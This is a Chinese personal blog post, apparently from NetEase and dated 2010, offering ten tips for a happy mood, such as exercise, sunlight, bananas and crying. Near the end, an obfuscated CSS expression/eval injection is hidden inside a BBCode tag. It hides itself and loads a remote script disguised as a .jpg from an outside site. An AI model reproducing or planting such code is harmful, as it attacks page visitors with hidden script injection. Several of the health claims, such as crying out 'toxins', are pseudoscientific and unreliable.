注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

莣卟ㄋ伱の噯的博客

寶貝,不要害怕,俄永遠陪伴著你!

 
 
 

日志

 
 

培养愉快心情的十种方法  

2010-06-23 18:55:54|  分类: 个人日记 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
 
 
 
 
培养愉快心情的十种方法
 
 



当你不顺心或遇到挫折时,悲伤、愤怒、抑郁、忧愁等损害健康的恶性情绪便会纷至沓来。如何尽快尽早地积极化解?心理学家向您推荐如下措施,您不妨一试。 
                 








首先来[摘一个苹果]吃吃吧 
再来逗逗小鱼儿呀 
     鼠标拖动小鱼,试试看,很好玩的!       

你再用鼠标点击树枝梅花就开了
不要急,我现在就告诉你!培养愉快心情的十种方法 - 殘缺的愛 - 莣卟ㄋ伱の噯的博客 

培养愉快心情的十种方法 - 殘缺的愛 - 莣卟ㄋ伱の噯的博客


一、多做跑步、转圈、疾走、游泳等体育活动。这些活动是化解不良情绪的行之有效的措施之一。 

    二、晒太阳。著名精神病专家缪勒指出,阳光可改善抑郁病人的病情。 

    三、吃香蕉。德国营养心理学家帕德尔教授发现,香蕉含有一种能帮助人脑产生五羟色氨的物质,它可减少不良激素的分泌,使人安静、快活。 

    四、大声哭喊。找个僻静的所在,尽情地大声哭喊。日本心理专家研究发现,这种哭喊可使压抑心理得到尽情宣泄,同时,由不良情绪产生的毒素,也可“哭喊”出来。 

    五、睡好觉。睡眠有助于克服恶劣情绪,稳心定神。一觉醒来,心情就会好多了。 

    六、听音乐。音乐可使大脑产生一种镇静安神的物质,但要注意选择“对路”的音乐。 

    七、赏花草。花草的颜色和气味,有调解人情绪的作用。 

    八、观山水。青山绿水,莺歌燕舞,会将你置于美好的情境中,心情便会被“快活化”。 

    九、打木偶。将木偶贴上让自己不顺心者的名字或事件名称,然后拼命击打。过后,人不再憋闷,心情自然就会好起来。 

    十、洗淋浴。在浴池中淋浴,能产生一种安神的活性分子,不快时,不妨洗洗淋浴,过后定会一身轻松。 
 
培养愉快心情的十种方法 - 殘缺的愛 - 莣卟ㄋ伱の噯的博客 


[flash,0,0]http://catche.qq.com/temp/20081209/4236888.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//love.avtupian.com/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]
  评论这张
 
阅读(18)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017